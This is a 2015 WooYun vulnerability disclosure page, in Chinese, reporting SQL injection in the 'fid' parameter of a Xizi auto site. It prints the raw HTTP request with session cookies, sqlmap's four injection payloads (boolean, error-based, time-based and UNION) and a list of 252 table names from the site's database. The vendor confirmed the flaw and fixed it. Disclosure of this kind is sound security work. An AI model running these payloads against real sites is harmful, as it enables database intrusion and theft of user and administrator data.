当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159241

漏洞标题:西子湖畔某站存在SQL注入漏洞可UNION

相关厂商:bbs.xizi.com

漏洞作者: 路人甲

提交时间:2015-12-08 10:43

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

详细说明:

GET /index.php?a=ajax_gettypeid&c=api&fid=1&m=auto HTTP/1.1
Cookie: PHPSESSID=uvfo5aisjak8bat7tmfocvces3; uvcsU_wap_type_history=7481BARUCVFUUgkBBQ8BBwIDBQYCVABSAFFRVgNXBEwBAlIYA0kBUldOCgYYCVcE; CNZZDATA1279123=cnzz_eid%3D1338230411-1449338650-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1449338650; concern_his=1%3D1449342122079%257C1%257C1%2621%3D1449342303694%257C1%257C1%26655%3D1449342369301%257C1%257C1; compare_list=; concern=1%7C21%7C655; sYQDUGqqzHsearch_history=undefined%7C1; CNZZDATA1253348807=1602830445-1449342412-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1449342412; CNZZDATA4510143=cnzz_eid%3D1947046294-1449338128-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1449338128
Host: testauto.xizi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

81.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: fid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: a=ajax_gettypeid&c=api&fid=1 AND 9704=9704&m=auto
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: a=ajax_gettypeid&c=api&fid=1 AND (SELECT 3806 FROM(SELECT COUNT(*),CONCAT(0x71787a6271,(SELECT (ELT(3806=3806,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&m=auto
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: a=ajax_gettypeid&c=api&fid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Euma)&m=auto
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: a=ajax_gettypeid&c=api&fid=1 UNION ALL SELECT CONCAT(0x71787a6271,0x6e724f577a494f675a50,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &m=auto
---
back-end DBMS: MySQL 5.0
Database: auto2013
[252 tables]
+------------------------------------+
| #mysql50#v9_xz_auto_pics( |
| v9_admin |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_announce |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_cache |
| v9_category |
| v9_category_priv |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_comment |
| v9_comment_check |
| v9_comment_data_1 |
| v9_comment_setting |
| v9_comment_table |
| v9_content_check |
| v9_copyfrom |
| v9_datacall |
| v9_dbsource |
| v9_download |
| v9_download_data |
| v9_downservers |
| v9_favorite |
| v9_form_myform |
| v9_groupbuy |
| v9_groupbuy_bak |
| v9_groupbuy_data |
| v9_groupbuy_data_bak |
| v9_hits |
| v9_ipbanned |
| v9_job_company |
| v9_keylink |
| v9_keyword |
| v9_keyword_data |
| v9_link |
| v9_linkage |
| v9_log |
| v9_member |
| v9_member_detail |
| v9_member_group |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_menu |
| v9_menu_bak |
| v9_message |
| v9_message_data |
| v9_message_group |
| v9_model |
| v9_model_field |
| v9_module |
| v9_mood |
| v9_news |
| v9_news_bak |
| v9_news_data |
| v9_news_data_bak |
| v9_newssale_data |
| v9_newssale_data_bak |
| v9_page |
| v9_pay_account |
| v9_pay_payment |
| v9_pay_spend |
| v9_picture |
| v9_picture_bak |
| v9_picture_data |
| v9_picture_data_bak |
| v9_position |
| v9_position3 |
| v9_position_data |
| v9_position_data_bak |
| v9_poster |
| v9_poster_201012 |
| v9_poster_201101 |
| v9_poster_201102 |
| v9_poster_201103 |
| v9_poster_201104 |
| v9_poster_201105 |
| v9_poster_201106 |
| v9_poster_201107 |
| v9_poster_201108 |
| v9_poster_201109 |
| v9_poster_201110 |
| v9_poster_201112 |
| v9_poster_201201 |
| v9_poster_201202 |
| v9_poster_201203 |
| v9_poster_201204 |
| v9_poster_201205 |
| v9_poster_201206 |
| v9_poster_201207 |
| v9_poster_201208 |
| v9_poster_201209 |
| v9_poster_201210 |
| v9_poster_201211 |
| v9_poster_201212 |
| v9_poster_201301 |
| v9_poster_201302 |
| v9_poster_201303 |
| v9_poster_201310 |
| v9_poster_201311 |
| v9_poster_201312 |
| v9_poster_201401 |
| v9_poster_201402 |
| v9_poster_201403 |
| v9_poster_201404 |
| v9_poster_201405 |
| v9_poster_201406 |
| v9_poster_201408 |
| v9_poster_201410 |
| v9_poster_201411 |
| v9_poster_201412 |
| v9_poster_201501 |
| v9_poster_201502 |
| v9_poster_201503 |
| v9_poster_space |
| v9_queue |
| v9_release_point |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_site |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_template_bak |
| v9_times |
| v9_type |
| v9_urlrule |
| v9_video_content |
| v9_video_store |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_weixin_member |
| v9_weixin_news_content |
| v9_weixin_prize |
| v9_weixin_reply_keyword |
| v9_weixin_reply_msg |
| v9_weixin_reply_news |
| v9_weixin_reply_rule |
| v9_weixin_share |
| v9_weixin_site |
| v9_weixin_site_bak |
| v9_weixin_site_menu |
| v9_weixin_site_menu_bak |
| v9_weixin_test |
| v9_workflow |
| v9_xizi_auto_admin |
| v9_xizi_auto_admin_role |
| v9_xizi_auto_admin_role_priv |
| v9_xz_auto_actcode_did |
| v9_xz_auto_appointment |
| v9_xz_auto_appointment_time |
| v9_xz_auto_car_extend |
| v9_xz_auto_carowner |
| v9_xz_auto_category |
| v9_xz_auto_channel_type_news |
| v9_xz_auto_clue |
| v9_xz_auto_color |
| v9_xz_auto_company |
| v9_xz_auto_customer |
| v9_xz_auto_customer_action |
| v9_xz_auto_customer_bak |
| v9_xz_auto_dealer |
| v9_xz_auto_dealer_action |
| v9_xz_auto_dealer_bak |
| v9_xz_auto_dealer_customer |
| v9_xz_auto_dealer_customer_bak |
| v9_xz_auto_dealer_log |
| v9_xz_auto_dealer_news |
| v9_xz_auto_dealer_points |
| v9_xz_auto_dingdan |
| v9_xz_auto_gb_log |
| v9_xz_auto_gb_sign |
| v9_xz_auto_gift |
| v9_xz_auto_gift_action |
| v9_xz_auto_gift_action_log |
| v9_xz_auto_gift_bak |
| v9_xz_auto_insert |
| v9_xz_auto_luck |
| v9_xz_auto_luck_member |
| v9_xz_auto_luck_user |
| v9_xz_auto_manufacturer |
| v9_xz_auto_manufacturer_bak |
| v9_xz_auto_member |
| v9_xz_auto_message |
| v9_xz_auto_model |
| v9_xz_auto_model_bak_20140912 |
| v9_xz_auto_model_bak_20141120 |
| v9_xz_auto_model_news |
| v9_xz_auto_msg_log |
| v9_xz_auto_notifylog |
| v9_xz_auto_order |
| v9_xz_auto_order_action |
| v9_xz_auto_order_alarm |
| v9_xz_auto_order_bak |
| v9_xz_auto_pics |
| v9_xz_auto_pics_album |
| v9_xz_auto_pics_album_bak_20141124 |
| v9_xz_auto_pics_bak |
| v9_xz_auto_position |
| v9_xz_auto_position_data |
| v9_xz_auto_praise |
| v9_xz_auto_product |
| v9_xz_auto_product_cate |
| v9_xz_auto_product_tag |
| v9_xz_auto_quote |
| v9_xz_auto_quote_bak_20141030 |
| v9_xz_auto_quote_bak_20141030_2 |
| v9_xz_auto_quote_bak_20141031 |
| v9_xz_auto_region |
| v9_xz_auto_saiprice |
| v9_xz_auto_sales |
| v9_xz_auto_service |
| v9_xz_auto_service_bak |
| v9_xz_auto_service_comment |
| v9_xz_auto_shop |
| v9_xz_auto_shop_bak |
| v9_xz_auto_shop_index |
| v9_xz_auto_shop_news |
| v9_xz_auto_shop_product_link |
| v9_xz_auto_shop_region |
| v9_xz_auto_shop_welfare_link |
| v9_xz_auto_style |
| v9_xz_auto_test |
| v9_xz_auto_test_action |
| v9_xz_auto_type |
| v9_xz_auto_type_bak |
| v9_xz_auto_type_news |
| v9_xz_auto_type_style |
| v9_xz_auto_validate |
| v9_xz_auto_webhooks_log |
| v9_xz_auto_welfare |
| v9_xz_auto_welfare_roll |
+------------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-12-08 10:57

厂商回复:

确认并修复,感谢漏洞作者提交

最新状态:

暂无


漏洞评价:

评价